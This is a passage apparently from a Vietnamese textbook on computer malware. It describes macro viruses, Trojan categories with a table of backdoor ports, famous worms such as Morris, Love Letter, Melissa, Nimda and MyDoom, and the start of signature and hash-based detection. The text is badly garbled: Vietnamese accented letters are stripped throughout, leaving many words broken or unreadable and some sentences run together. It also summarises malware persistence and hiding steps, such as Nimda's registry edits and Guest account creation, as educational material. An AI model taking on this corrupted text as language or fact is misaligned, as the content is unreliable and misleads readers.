nhng ln lm vic v sau.

Thng thng, cc virus marco c thi hnh khi ngi dng ch chy

chng. Mt khc cc virus marco c th thi hnh mt cch t ng c khi

cc virus marco c tn trng vi tn cc marco t ng hoc trng tn vi cc

lnh chun ca Word hoc Excel. y chnh l phng php cc virus marco

t ng c kch hot v ly lan trong nhng iu kin nht nh.

Mt s v d trong Word v nhng lnh chun nh: FileClose, FileOpen,

FileSave, FileSaveAs.v nm marco. Cc marco ny s t ng thi hnh khi

cng victng ng c thc hin.

Tn T ng thi hnh lnh

AutoClose ng file son tho

AutoStart Khi ng Word

AutoExit Kt thc Word

AutoNew To file vn bn mi

AutoOpen M file vn bn

Nh vy, c th ly lan, virus marco lun phi c t nht mt marco thi

hnh t ng c. Trong marco ny s c mt on m tin hnh ly lan

bng cch t sao chp ton b m virus sang cc file khc. Ngoi ra, virus

marco c th c thm cc phn ph hoi, gy nhim v ngy trang.


24/68


25/68

25

1.4.2.2. Du hiu my tnh khi b nhim virus

u tin Virus c gng kt ni vi trnh son tho Visual Basic Editor v

hin th hp thng bo:

Hunter

preciso remover a protecao ANTIVIRUS ofrecida pelo Hunter

antesde utilizar este

servico.

Sau virus s coppy chnh n ti File X.BAS ti ng dn C:\. S

tn ti ca file ny xc nhn c s ly nhim ca virus ti mt thi im

no .

1.4.2.3. Phng php ca s truyn nhim

Virus mc ni vi s kin m file ca MicrosoftWord97, bt k fileno

c m ra bi MicrosoftWords97 s b ly nhim Virus.

Cc tn gi khc

Virus macro ny c cc tn gi khc nh l:

Macro Word97.Hunter

W97M_Hunter

WM97/Antiv-A


26/68

26

1.5. TROJAN

1.5.1. nh ngha Trojan

Nhiu ngi ngh rng khi h c mt chng trnh qut virus tt v c

bn cp nht mi nht th h s an ton, my h s khng b nhim. Trojan haykhng ai c th truy cp my tnh ca mnh, iu ny hon ton sai. Mc ch

ca ngi vit chng trnh chng virus l pht hin ra con virus mi, khng

phi l Trojan. Nhng khiTrojan ly nhim n nhiu ngi s dng th nhng

chuyn vin chng virus s np thm n vo trong chng trnh qut ca mnh.

Tuy nhin y ch l mt phn rt nh cc Trojan m cc chuyn vin phng

chng virus pht hin c v avo trong danh sch nhng virus cn dit.

Hn na, cc chng trnh qut virus ny khng phi l tngla, n s

khng pht hin ra trojan v bo v ta trong khi ta ang trn mng. Nhiu

ngi dng khng bit Trojan l g v h ti xung nhng file m khng bit r

ngun gc.

1.5.2. Phng php ly nhim Trojan

Theo s liu thng k ca trung tm BKIS 90% s ngi c hi c ti

xung, hay sao chp file t u khng th tr li l khng, nhng thc s h thc hin trc vi ngy.

Trojan c th b ly nhim t rt nhiu con ng khc nhau:

- Trojan ly nhim t ICQ

- Trojan ly nhim t file nh km trong mail

- Trojan truy nhp trc tip


27/68

27

1/. Trojan ly nhim t ICQ:

Nhiu ngi ngh rng Trojan khng th ly lan trong khi h ang ni

chuyn trn ICQ nhng h khng ngh l ngi ang ni chuyn c th gi cho

h mt con Trojan.ICQ cho php gi mt file .exe nhng n c sa sao cho nhn nh

c v file l file hnh nh, m thanhV d, c mt con Trojan c kp

chung vi file hnh nh v ngi gi thay i biu tng ca file .exe thnh

biu tng ca file .bmp, ngi nhn s chy con Trojan v khng h nghi

ng, v khi chy file .exe , n vn hin ln hnh nh nh mt file nh. Kt

qu l trn my ngi nhn c mt con Trojan. l l do hu ht ngi

dng ni rng h khng chy bt k file l no trog khi h chy n.

Mt cch ngn nga tt nht l lunkim tra kiu file trc khi chy.

2/. Trojan ly nhim t file nh km trong mail:

a s Trojan c ly lan bng mail. Cc hacker hay ch nhn ca con

Trojan thng nh km file Trojan vo trong mt bc th in t v gi i.

Khi ngi dng kch hot vo file nh km hay c khi xem th th con Trojan

c th c kch hot xm nhp h thng v thc hin cc chc nng .

3/. Trojan truy nhp trc tip:

Mt my tnh ngay c khi c trang b tt nht vi nhng bin php bo

v, vi chng trnh chng virus tt nht th cng khng th lm g c trc

s truy cp trc tip cangi c tnh a Trojan vo trong my tnh.


28/68

28

1.5.3. S nguy him ca Trojan

a s mi ngi cho rng Trojan khng c g nguy him, v my tnh ca

h vn lm vic bnh thng v tt c d liu vn cn, nu l mt con virus

th d liu c c th mt sch hay hot ng khng bnh thng .

Khi my tnh b nhim Trojan, tt c d liu trn my tnh c th b nguy

him, thng th ch nhn ca Trojan ny khng xa tt c file, m h s sao

chp v khai thc nh ti liu b mt ca cng ty, ti khon Internet, ti khon

c nhn v khi khng c g khc c th thc hin xa d liu. i khi hacker

cn dng Trojan ci t virus ph hoi nh CIH chng hn. l mt vi v

d hacker c th thc hin khi h ci thnh cng Trojan.

1.5.4. Phn loi Trojan

C nhiu Trojan, nhng ch yu n c chia ra lm cc dng sau:

1/. Trojan dng truy cp t xa:

Hin nay, Trojan ny c s dng rt nhiu. Chc nng chnh ca

Trojan ny l m mt cng trn my tnh nn nhn hacker c th quay li

truy cp vo my nn nhn.

Trojan ny rt d s dng. Ch cn nn nhn b nhim Trojan v ch nhn

ca n c a ch IP ca nn nhn th h c th truy cp ton quyn trn my

nn nhn.

Ty loi Trojan m chc nng ca n khc nhau (key logger, download,

upload file, thc hin lnh..).

Mt s con Trojan ni ting loi ny nh: netbus, back orifice

2/.Mc ni bn phm (keylogger):

N ghi li tt c hnh ng trn bn phm ri lu vo trong mt file,

hacker s tm n my tnh v ly i file cha ton b thng tin v nhng g

ngi s dng g vo bn phm.

V d: kuang keylogger, hooker, kuang2


29/68

29

3/. Trojan gi mt khu:

c tt c mt khu lu trong cache v thng tin v my tnh nn nhn ri

gi v n hacker.

V d: barok, kuang, bario

4/. Trojan ph hy:

Nhng con Trojan ny ch c mt nhim v duy nht l tiu dit tt c cc

file trn my tnh.

V d: CIH

Nhng con Trojan ny rt nguy him v khi my tnh b nhim ch mt

ln thi th tt c d liu mt ht.

5/. FTP Tr ojan:

Loi Trojan ny s m cng 21 trn my tnh v cho tt c mi ngi

ktni n my tnh m khng cn c mt khu v h s ton quyn ti bt

k d liu no xung.

1.5.5. Mc ch ca Trojan

Nhiu ngi ngh rng hacker dng Trojan ch ph hoi my ca h,

iu hon ton sai lm. Trojan l mt cng c rt hu hiu gip ngi s

dng n tm c rt nhiu thng tin trn my tnh ca nn nhn.

- Thng tin v Credit Card, thng tin v khch hng.

- Tm kim thng tin v account v d liu b mt.

- Danh sch a ch email, a ch nh ring.

- Account Passwords hay tt c nhng thng tin c v cng ty.


30/68

30

1.5.6. Phng thc hot ng ca Trojan

Khi nn nhn chy file Trojan, nu l Trojan dng truy cp t xa (remote

access), file server trong Trojan s lun ch lng nghe. N s ch n khi

nhn c tn hiu ca Client, ngay lp tc n s m ngay mt cng no hacker c th truy cp vo. N c th s dng giao thc TCP hoc giao thc

UDP.

Khi hacker kt ni vo a ch IP ca nn nhn, h c th lm bt c iu

g v ni dung Trojan bao hm nhng iu khin .

Cn nu Trojan loi Keylogger hay loi gi mt khu th n tin hnh

vic ghi li tt c nhng g c g trn bn phm. Tt c c lu tr trongmt file theo mt ng dn nht nh. Ti mt thi im no ch nhn ca

con Trojan s xm nhp vo my tnh thng qua cng sau m con Trojan

m v ly i file . i vi nhng con Trojan c phng thc gi file

trong bn thn n th n tin hnh gi file n a ch email xc nh trc.

i vi Trojan loi ph hy th hot ng ca n l np khi Windows

khi ng v tin hnh cng vic xa file ca n.

Mt vi Trojan c np ngay khi Windows c khi ng bng cch

sa file win,.ini, system.ini hay sa registry.


31/68

31

1.5.7. Cng ca mt s Trojan thng dng

Tn gi Cng Tn gi Cng

Satanz Backdoor 666 Silencer 10001

Shockrave 1981 Shivka-Burka 1600

WebEx 1001 SpySender 1807

Doly Trojan 1011 Psyber Sream Server 1170

Ultors Trojan 1234 VooDoo Doll 1245

FTP 99CMP 1492 BackDoor 1999

Trojan Cow 2001 Ripper 2023

Bugs 2115 Deep Throat 2140

The Invasor 2140 Phineas Phucker 2801

Masters Paradise 30129 Portal of Doom 3700

WinCrash 4092 ICQ Trojan 4590

Sockers de Troie 5000 Sockets de Troie 1.x 5001

Firehotcker 5321 Blade Runner 5400

Blade Runner 2.x 5402 Robo-Hack 5569

Blade Runner 1.x 5401 DeepThroat 6670

DeepThroat 6771 GateCrasher 6969


32/68

32

1.6. INTERNET WORM

1.6.1. Gii thiu chung

Su InternetWorm l loi virus c sc ly lan rng, nhanh v ph bin

nht hin nay. Worm kt hp c sc ph hoi ca virus, c tnh m thm caTrojan v hn htl s ly lan ng s m ngivit virus trang b cho n

tr thnh mt k ph hoi vi v kh ti tn. Tiu biu nh Mellisa hay Love

Letter. Vi s ly lan ng s chng lm t lit hng lot h thng my ch,

lm ch tc ng truyn Internet.

Thi im ban u, Worm c dng ch nhng virus pht tn bng

cch tm cc a ch trong s a ch (Address book) ca my m n ly nhim

v t gi chnh n qua email ti nhng a ch tm c.

Nhng a ch m virus tm thy thng l a ch ca bn b, ngi thn,

khch hng... ca ch s hu my b nhim. iu nguy him l virus c th gi

mo a ch ngi gi l a ch ca ch s hu my hay a ch ca mt c

nhn bt k no ; hn na cc email m virus gi i thng c ni dung

git gn hoc hp dn d d ngi nhn m file virus nh km. Mt s

virus cn trch dn ni dung ca mt email trong hp th ca nn nhn tora phn ni dung ca email gi mo. iu ny gip cho email gi mo c v

tht hn v ngi nhn d b mc la. Nhng vic ny din ra m ta khng

h hay bit. Vi cch hon ton tng t trn nhng my nn nhn khc,

Worm c th nhanh chng ly lan trn ton cu theo cp s nhn. iu l

gii ti sao ch trong vng vi ting ng h m Mellisa v Love Letter li c

th ly lan ti hng chc triu my tnh. Ci tn ca n , Worm hay "Su

Internet" cho ta hnh dung ra vic nhng con virus my tnh b t my tnh

ny qua my tnh khc trn cc "cnh cy" Internet.

Vi s ly lan nhanh v rng ln nh vy, Worm thng c ngivit

ra ci thm nhiu tnh nng c bit, chng hn nh kh nng nh cng mt

ngy gi v ng lot t cc my nn nhn (hng triu my) tn cng vo mt

a ch no . Ngoi ra, chng cn c th mang theo cc BackDoor th ln

my nn nhn, cho php ch nhn ca chng truy nhp vo my ca nn nhnv lm mi th nh ngi trn my mt cch bt hp php.


33/68

33

Ngy nay,khi nim Worm c m rng bao gm c cc virus ly

lan qua mng chia s ngang hng peer to peer, cc virus ly lan qua a USB

hay cc dch v gi tin nhn tc thi (chat), c bit l cc virus khai thc cc

l hng phn mm ly lan.

Cc phn mm (nht l h iu hnh v cc dch v trn ) lun tim n

nhng li/l hng an ninh nh li trn b m, mkhng phi lc no cng c

th d dng pht hin ra. Khi mt l hng phn mm c pht hin, khng lu

sau s xut hin cc virus c kh nng khai thc cc l hng ny ly

nhim ln cc my tnh t xa mt cch m thm m ngi ch my hon ton

khng hay bit. T cc my ny, Worm s tip tc b qua cc my tnh khc

trn mng Internet vi cch thc tng t.

Ta c th thy c s nguy him ca su Internet qua vic tm hiu su

MyDoom.

Ngy xut hin su MyDoom u tin: 26/01/2004

Ngy lan trn n Vit Nam: 27/01/2004

Cuctn cng ca MyDoom ln nh im vo ngy 31/01/2004 khi chng triu email nhim MyDoom cng ng lot gi ti Website ca Yahoo

lm nghn mch.

Bc tng la v b lc (Filewall v Filter) ngay lp tc c dng ln

ngn chn v loi b tt c cc email c tiu : Test, Hi, Hello, Mail

Delivery System, Mail Transaction Failed, Server Report, Status Error d y

cng l tiu Yahoo hay s dng.

D thit lp h thng bo v kp thi, trang web Yahoo t 8h17 n

12h10 trong ngy 31/01/2004 cng b tn cng bng lnh DoS (Denial of

Service) v khi g dng lnh http://www.mail.yahoo.com/ th ng dn

c thay th bng http://www.search.com/. Mi hot ng trn Website ny

gn nh t lit.


34/68

34

Bin th su mi c gil MyDoom.B (cn c tn l Norvarg.A,

Mimailk)c kh nng chng truy cp vo cc trang web cung cp phn mm

chng virus.

Trong chng trnh vit ban u ca MyDoom ch to ln sng mail rc

v tp trung chun b cho t ph hoi tng lc t ngy 01- 12/02/2004 vo

website ca SCO Group Inc. Vi bin th mi MyDoom.B c b sung

thm cu lnh tn cng thm website Microsoft.

Su MyDoom c vit c ch nh l khng tn cng vo cc a ch

email ca cc c quan chnh ph, mt s trng i hc, v mt s hng bo v

my tnh, k c Symantec.Cc my tnh chy h iu hnh Windows XP ca Microsoft c nguy c

b ly nhiu nht.

Theo cc chuyn gia cng ngh, thit hi ti chnh do su MyDoom k

c vic nh ch mng Internet v thit hi c tnh bng con s hng t .

Phn mm dit MyDoom c cp nht u tin vo ngy 28/01/2004

(ca hng Symantic)

160.000 email nhim virus c gi n cho mt cng ty ch trong 60

pht ti USA.

M nhiu cng nht: 71 cng , t cng 3127 n cng 3198. Symantec

thng k c c ti 2.100 h thng khc nhau trn mng ang qut cc ca

sau do MyDoom to ra.

50.000 h thng my tnh b nhim virus v b khng ch t xa, nguy ccho t tn cng tng lc.

300 triu th mang virus c pht tn, chim 1/12 tng lng email lu

chuyn trn Internet trong hai ngy 500.000 my tnh b nhim MyDoom ch

sau 3 ngy (k t khi pht hin su).

142 quc gia trn th gii b nhim.


35/68

35

1.6.2. Cc giai on pht trin ca su Internet

Thng qua s phn tch ca nhng con suInternet in hnh trong cc

giai on pht trin ca su Internet, ta c th thy nguyn tc xy dng su

Internet, tc pht trin ca loi virus ny v mc nguy him ca n.

1.6.2.1. Su Morris

Su Morris l su my tnh u tin c pht tn qua Internet v cng l

con su u tin thu ht c s ch ng k ca cc phng tin thng tin

i chng.

Tc gi ca n l Robert Tappan Morris, mt sinh vin ti i hc

Cornell. Su Morris c th ln mng vo ngy 2 thng 11 nm 1988 t hcvin MIT, n c pht tn t MIT che du thc t l con su c b t

ngun t Cornell. (Robert Tappan Morris hin lgio s ti MIT.)

Sai lm nghim trng bin con su t ch ch l mt th nghim tr

thc c tim nng v hi thnh mt su tn cng t chi dch v y ph hoi

l ti c ch ly lan. Con su xc nh xem c xm nhp mt my tnh mi

hay khng bng cch hi xem hin c mt bn sao no ang chy hay cha.

Nhng nu ch lm iu ny th vic xa b n li qu d dng, bt c ai cng

ch phi chy mt tin trnh tr li rng "c" khi c hi xem c bn sao

no cha, v con su s trnh. trnh chuyn ny, Morris thit k con su

t nhn i vi xc sut 40%, bt k kt qu ca vic kim tra ly nhim l g.

Thc t cho thy t l nhn i ny l qu cao v con su ly lan nhanh chng,

lm nhim mt s my tnh nhiu ln.

Ngi ta thng k rng c khong 6.000 my tnh chy Unix b nhimsu Morris. Paul Graham ni rng "Ti chng kin ngi ta xo xo ra

con s ny, cngthc nu n nh sau: ai on rng c khong 60.000 my

tnh ni vi Internet, v con su c th nhim 10% trong s ". M c

tnh thit hi vo khong t 10 n 100 triu la.


36/68

36

Robert Morris b x v buc ti vi phm iu lut nm 1986 v lm

dng v gian ln my tnh (Computer Fraud and Abuse Act). Sau khi chng n,

anh ta b pht 3 nm n treo, 400 gi lao ng cng ch v khon tin pht

10.050 la M.

Su Morris i khi c gi l "Great Worm" (Su khng l) do hu qu

nng n m n gy ra trn Internet khi , c v tng thi gian h thng

khng s dng c, ln v nh hng tm l i vi nhn thc v an ninh v

tin cy ca Internet.

1.6.2.2. Su Kakworm

Kakworm (KAV) l mt con su. N c xy dng vi mc ch xmnhp vo ch d b tn thng ca s bo v trnh duyt Internet Explorer hay

chng trnh Outlook Express. Bn nng cp sa cha cho tnh d b tn

thng ny c Microsoft a ra v cn thit phi nng cp li ngay (theo

thng co an ton MicrosoftMS99-032). Nhng trnh duyt Microsoft v th

tn in t cha b nh hng.

KAV c gn vo trong ch k HTML ti tin nhn. Ngi dng khng

nhn thy n bi v khng c dng vn bn no c th hin th n ra mn hnh

(KAV c vit bng JavaScript).

Ngi dngkhng cn kch hot vo bt k file nh km no hoc thc

hin bt k hot ng no kch hot KAV. Ch cn ngi dng xem th l

con su KAV c th xm nhp vo h thng.

c kch hot mt ln, KAV lu file KAK.HTA vo trong th mc khi

ng ca Windows. Ln sau khi my tnh c khi ng, KAK.HTA chy v

to ra KAK.HTA trong th mc Windows.

Trong thng no cng c mt ln sau nm gi chiu con su KAK s hin

th thng bo Kagou - Anti - Krosoft ni khng phi l hm nay v sau tt

my tnh.

KAK c xy dng da vo Bubbleboy, con su u tin c th lan

truyn m khng cn ngi dng phi m file nh km.


37/68

37

1.6.2.3. Su Love Letter

Trong dng nguyn bn ca con su gi chnh n cho nhng ngi dng

qua mt file nh km theo th tn in t. Ch tin nhn l I LOVE YOU

v ni dung tin nhn l Mt cch chn thc kim tra bc th tnh yu nhkm c gi n t ti. File nh km c gi LOVE -LETTER-FOR-

YOU.TXT.vbs (m rng kp .txt.vbs). Khi kch hot vo file nh km chy

(gi thit rng my tnh ci Windows Scripting Host) v chu trnh ly

nhim li bt u ln na.

S nhn i l cn thit cho con su ny ging nh khi n c gng khai

thc s d dng ca hm s dng. Nhng chng trnh th tn v th mc theo

s mc nh khng cho thy nhng phn m rng ca file. Trong trng hp

ny nu my tnh c tp hp ty chn mc nh th file nh km l ra ging

nh gi LOVE -LETTER-FOR-YOU.TXT v nh vy l mt file vn bn thay

v mt file c th thc hin.

Trong thao tc, con su thc hin vi hot ng:

N kim tra file WinFAT.32.exe trong th mc ti xung t Interner

Explorer. Nu khng tm thy con su thay i trang khi ng Internet

Explorer ng k ti mt trong mt s website ni file WIN-BUGSFIX.exe s

c ti xung v tp hp chy trn my tnh cho ln tip theo.

Con su s sao chp chnh n vo hai ch ni n s thi hnh khi ng li

trn mi my tnh khc.

N s c gng gi chnh n cho mi a ch trong danh sch a ch

Outlook .

Con su tm kim tt c nhng file c phn m rng l VBS, VBE, JS,

JSE, CSS, .WSH, SCT hoc HTA. Nu tm thy, chng s ghi ln vi virus

v phn m rng ca n i tn thnh .VBS.

File ha vi phn m rng l JPG hoc JPEG cng c ghi ln vi

virus v phn m rng .VBS s c thm vo tn ca n.


38/68

38

Nhng file a phng tin vi phn m rng l MP2 v MP3 th c

sao chp ti mt file mi cng tn v phn m rng .VBS cng c thm

vo.

Con su tm kim mt chng trnh client MIRC v nu tm thy, s th

mt bn sao v file HTML c thit k gi con su qua MIRC .

Nhng file virus nguyn bn c s nh hng rt nhiu, nhiu bin th

pht trin nhanh chng v tri rng ra. Hn 20 bin th c bo co v

trong thi gian s lng bin th thc t nhiu hn s lng bin th

c bo co. Mt vi n tng nht c th ni n:

Ch fwd: khng c ni dung no, file nh km: very funy.vbs.

Ch Ngy nhng ngi m: c ni dung Chng ta c th hot ng

rt t th gi ca bn khong 326.92 USD chongy l c bit nhng ngi

m. Chng ti gn mt danh sch n hng chi tit ti a ch email ny.

Xin in ra file nh km v gi n trong mt ch an ton. Cm n mt ln na

v mong c mt ngy nhng ngi m hnh phc:

[email protected], file nh km: mothersday.vbs.

Ch : virus ALERT!!!, gi t: [email protected], ni dung:

khch hng Symantec thn mn, trung tm nghin cu AV ca Symantec bt

u nhn nhng bo co lin quan ti VBS.LoveLetter. Mt virus vo mt bui

sng sm ngy 4/5/2000 GMT. Con su ny xut hin bt ngun t vng Thi

Bnh Dng Asia. S phn phi ca virus ny lan rng v hng trm trong

hng nghn nhng c my c bo co b ly nhim, file nh km:

protect.vbs.

Ch : Lm sao bo v chnh ta khicon rpILOVE !, ni dung: t

y th tas c cch loi tr virus tnh yu, file nh km: Virus-Protection-

Intruction.vbs.


39/68

39

1.6.2.4. Su Melissa

Melissa l mt s kt hp gia virus marco v con su email. Con su

u tin c tm thy vo th su, ngy 26 thng 3 nm 1999 v s dn tri ra

c thc hin rt nhanh chng xung quanh th gii .V c bn, khi mt ngi dng kch vo file .DOC nh km theo th

in t chng s chy c virus marco. Mt trong nhng vic u tin m virus

s lm l nh dng v gi mt thng bo ti 50 a ch u tin trong danh

sch a ch Outlook. Ch liu l Tin nhn quan trng t .V ni dung tin nhn: y l ti liu m bn hi v ....(khng cho bt

c ai khc thy).

Gn lin ti thng bo ny l ti liu hin thi ang lm vic. T khi

Mellissa l virus v ly nhim file NORMAL.DOC n c th gi file ly nhim

ra ngoi ging nh l ci g ht sc quan trng t my tnh nhn c.

Vo trng hp him c ni pht, gi, ngy v thng l ging nhau (8

gi 8 pht ngy 8 thng 8) virus s chn mnh Hai mi hai, thm vo b

ba t ghi im, cng vi nm mi im cho vic s dng tt c nhng bc th

ca ti. Tr chi kt thc.

Phn phi ban u ca virus Melisa l vo mt file gi l LIST.DOC ci

m cha ng nhng mt khu ca nhng website X-rated, nhng website

khng lnh mnh.


40/68

40

1.6.2.5. Su Nimda

Nimda l mt trong s nhng con su phc tp c xy dng theo s

thu mn. N ly nhim file, thc hin dn tri qua ng Website, ng

th tn in t, v s dn tri qua khai thc vng mng cc b. N ly nhim ttc cc phin bn ca Windows t Windows95 n Windows2000 cng nh IIS

ca Microsoft.

Nimda cng ly lan qua Website ng khng kn v vy m cc trnh

duyt s ly lan c vic nhn trang Web. Cui cng, Nimda l con su u

tin s dng my tnh ca ngi dng qut mng cc b xc nh nhng c

my c th b tn thng ng sau bc tng la c th tn cng (trc y

ch nhng con su ly lan qua server mi lm vic ).

Nimda s dng mt vi nhc im c bit n trong nhng server IIS

Microsoft. Mt s nhc im c nhc n ti a ch:

http://www.microsoft.com/tech/security/bulletin/ms00-078.asp

http://www.microsoft.com/tech/security/bulletin/ms01-020.asp

Su Nimda s dng mt s phng php sau lan truyn:

- T khch hng n khch hng qua th tn in t v ly nhim

file.EXE

- T khch hng n khch hng qua mng chia s cc b.

- T ngi phc v mng n khch hng qua trnh duyt ca nhng

website.

- T khch hng n ngi phc v mng qua s tch cc qut v s khai

thc tnh d b tn thng ca Microsoft IIS 4.0/5.0 directory travarsal.

- T khch hng n ngi phc v mng qua s qut nhng ca sau

c li bi con su Code Red II v sadmind/IIS.


41/68

41

1/. Ly nhim file:

Nimda hnh ng ging nh bt k file ly nhim chun no. N tm

kim nhng file .EXE v thm vo nhng file chnh n nh mt ti nguyn.

Khi file .EXE c mt ngi s dng ti xung ri th s nh hng ca nli c tng kh nng lan rng. ng thi, nu file ly nhim trn mt

my tnh trong mng cc b, nhng file chia s c th cng s lm lan rng

ra s nh hng ca con su Nimda.

Khi mt file ly nhim thc hin ly nhim qua nhng file khc.Nimda

thc hin xa file ny sau khi n kt thc nhng khng th lun lun lm c

iu ny. thc hin iu n to ra WININI.INI vi nhng lnh xa

file trong ln Windows khi ng sau .

Nimda tm kim file ly nhim. Nhng file .EXE gy ly lan bng cch

tm kim cc kha v tt c kha khc.

[SOFTWARE \ Microsoft\Windows\currentVersion\App Paths]

[SOFTWARE \ Microsoft\Windows\currentVersion\Explorer \Shell Th

mc]

c bit, file WINZIP32.EXE th khng b ly lan.

2/. Vai tr l su Email:

Theo kha cnh khc, Nimda hnh ng ging nh cc con su khc. N

tm kim a ch danh sch email khch hng trong my nn nhn. V nhng

file HTML trn my tnh cho a ch email v sau gi chnh n cho

nhng a ch ny trong mt file nh km.

Loi u tin c nh ngha nh loi Vn bn/Html nhng khng

cha ng ni dung g c. Loi th hai c nh ngha nh loi m

thanh/X-Wav ", nhng cha ng mt file nh km c tn l README.EXE,

l mt chng trnh.

Nimda s dng nghi thc SMTP ca chnh mnh gi email.


42/68

42

3/. Vai tr l su Web:

Nimda qut Internet cho nhng server mng IIS Micrososft. Khi mt

server c tm thy, nu tm c l hng bo v c th thm nhp vo, th

Nimda vo v sa i nhng trang Web ngu nhin trn server (cng nhnhng file .EXE trn server). Nhng s ci bin cho php con su c th lan

truyn ti ngi dng mt cch n gin ngay c khi duyt Website .

lm iu , Nimda tm kim m ngun ca file .HTML v .ASP. Khi

tm thy,n thm mt trnh JavaScript cui file .HTML v .ASP. M

JavaScript ny m mt file c tn README.EML khi c np bi mt trnh

duyt mng . README.EML l dng khc ca con su, c t vo trong th

mc ni m file thc thi nhng file .HTML c tm thy trn. Nhng trnh

duyt cha c lp cc l hng s t ng thc thi nhng file ny m khng

cn ngi dngphi kch hot vo. Ngi dng s khng nhn thy con su

hot ng khi n chy trong mt ca s thu nh.

Ly nhim qua nhng file chia s. S ly lan nhng my tnh trn mt

mng cc b s tm kim my tnh khc thng qua file chia s m. Khi no tm

thy, Nimda s chuyn h thng hoc file n (RICHED20.DLL) ln trn my

tnh khc trong bt k th mc no ni nhng file vn bn c ui .DOS hoc

.EML c tm thy. Sau , nu nhng file ny c m bng Word,

Wordpad, hoc Outlook nhng file n RICHED20.DLL cng s t ng c

thi hnh. Chnh iu ny s gy ra s ly lan cho my tnh .

ng thi, Nimda s c gng thay th file RICHED20.DLL ca

Windows sp xp v t nhng file c ui .EML (i khi l ui .NWS) votrong nhng th mc n truy nhp.


43/68

43

Nimda trn my tnh ca nn nhn. Nimda thng thng xut hin nh

mt file nh km README.EXE vi mt email, nhng c th l ra nh bt k

ci no khc. File c ui .EXE vihn 50 c tnh trong file gc c bn. Nu

chy, bn thn n trc ht sao chp ti mt th mc tm thi vi mt ci tnt ngu nhin dng MEP*.TMP ( u c * l c i din nhng c tnh

ngu nhin). Ri sau t ci th mc ny c t mnh thc hin bng cch s

dng dng lnh ty chn -Dontrunold ).

S dng nhng thao tc s hc s gip con su xc nh liu xem n c

th xa file (trong th mc tm). Nu m lm c th con su s xy dng

c cng c truyn nhim s cp ca n: mt MIME c m ha sao cho c

th sao chp chnh n cho nhng tin nhn nhiu phn m c th gn vo.

Nhng con su mi ny s c gn cho mt ci tn ngu nhin v c ct

gi trong mt th mc tm thi. By gi th n sn sng thc thi cng vic.

Cui cng, con su sao chp chnh n ti RICHED20.DLL, trong th

mc Windows\System, v t file n vo h thng. Khi Nimda c thc

thi tm kim nhng ti nguyn mng dng chung v bt u qut nhng file

c chia s. Mt s file c phn m rng .DOC v .EML n ang tm kim,

khi tm thy, RICHED20.DLL c sao chp ti th mc ca chng sao cho

n s c chy khi mt thnh phn OLE c cm trn my tnh t xa. iu

ny, sau s gy raqu trnh truyn nhim trn my tnh t xa.

Mt vi bnsao ca con su lm mt s vic sau:

N sa i kha [Software \ Microsoft \ Windows \ CurrentVersion \

Explorer\Advanced] nhng file n khng cn nhn thy c. iu ny sche du con su trong Explorer.

N to thm ti khon Guest trn h thng b ly nhim v ghp ti khon

Administrator v Guest thnh nhm c bit. S dng iu ny n s to ra

chia s " c:\ vi y nhng quyn truy cp c bit.

N xa nhng kha con t kha [ SYSTEM \ CurrentControlSet \

Servieces \lanmanserver \ Shares \ Security ] m tc dng vic lm l vhiu ha c s chia s an ton.


44/68

44

Chng 2.NHN DNG V PHT HIN VIRUS

2.1. K THUT NHN DNG VIRUS

2.1.1. Nhn dng chnh xc mu (Signature based delection)L cng vic nhn dng chnh xc cc virus khi chng trnh Anti Virus

AV c mu ca virus . K thut ny c th m t n gin nh sau: cc

file cn kim tra virus c phn tch v so snh vi mu virus bit trc,

nu pht hin mt on m virus th file c th b ly nhim virus v phn

mm thc hin bin php loi b virus khi file b ly nhim.

K thut nhn dng chnh xc mu virus khin cho cc phn mm lin tcphi cp nht c s d liu c kh nng nhn bit cc loi virus mi cng

cc bin th ca n.

Cc phn mm dit virus us dng k thut ny qut virus. S cc

m nhn dng cng ln th kh nng dit virus ca AV cng cao.

Tt c cc k thut nhn dng khc ra i u vi mc ch b tr cho

nhng thiu st ca k thut nhn dng ny.+ u im ca k thut nhn dngchnh xc mu virus:

chnh xc ca vic nhn dng virus cao, t nhm ln.

Kt qu ca vic dit virus tt hn. Cc k thut nhn din tng i ch

cho php nghi ng mt file c phi l virus hay khng. Nhn din chnh xc

cho php loi b cc triu chng i km vi virus, khi phc li h thng.


45/68

45

+Nhc im ca k thut nhn dng chnh xc mu virus:

Khuyt im ln nht ca k thut nhn dng chnh xc mu l khng th

i ph c vi cc virus mi hoc cha xut hin khi cha c mu nhn

din.

Khi lng c s d liu lu tr cc mu virus ln, lm cho kch

thc ca phn mm dit virus ln.

K thut ny i hi phi cp nht c s d liu lin tc nn mt nhiu

chi ph v thi gian, tin bc, cng sc.

2.1.2. Nhn dng theo m i din

Bn cht ca mt file bt k l mt chui sdi, nn chng ta c th coi l

mt chui string v tin hnh ly m hash ca file. Do tnh cht ca mnh, m hash

ny gn nh l duy nht. Khi chng ta c mu ca 1 virus chng ta s c th ly

c t mu mt m hash.Khi vic nhn dng mt file c phi l virus hay

khng chnh l vic to m hash file ri so snh hash vi hash mu virus. C

hai cch ly nhn dng theo m hash l: ly hash theo ton file v ly hash theo mt

phn thng tin quan trng.

2.1.2.1.Ly i din theo ton fileCch n gin nht to bn nhn din c trng cho mt mu virus l

tnh hash c trng cho cho ton b file mu. Cc thut ton hash thng c

s dng trong trng hp ny l MD5, SHA1, SHA256 ... c xc xut trng lp

thp c th s dng lm bn nhn din c trng cho mt file.

+ u im:

Cch thc hin n gin.

+Nhc im:

Chi ph tnh ton cao, thi gian tnh hash chm, nht l vi file c kch

thc ln. Nhc im ny bc l r khi qut virus cho tt c cc file trong h

thng.


46/68

46

2.1.2.2. Ly i din theo mt phn thng tin quan trng

khc phc nhc im trn ngi ta ci tin bng cch ch tnh

hash ca mt phn thng tin quan trng no ca file .V d i vi file thc

thi (.exe, .com, .dll, .sys .) phn thng tin quan trng c th l PE header(Portable executable), vng nh xung quanh Entry Point ca chng trnh.

Vic la chn vng thng tin no l quan trng ph thuc vo chin lc ring

ca tng hng AV

+ u im:

ci tinc tc ly hash ng k so vi phng php ly hash

ton file.+Nhc im:

Ci t phc tp hn phng php ly hash ton file.

Khng phi tt c cc nh dng file u c th la chn c vng cha

thng tin quan trng, c trng ca n, ch cth p dng vi mt s nh dng

nht nh.

2.1.3. Scan theo stringy l cch c in nht v vn c s dng ph bin trong hu ht cc

AV hin nay.

Ti v tr offset nht nh:

2.1.3.1.Xt theo offset tnh hon ton

Trong cch ny th ch n thun xc nh string no, ti v tr offset l

bao nhiu, ta s dng sign ny nhn dng mt file c phi l virus haykhng. Nguyn tc chn string nhn ra u l virus thng da vo tnh c

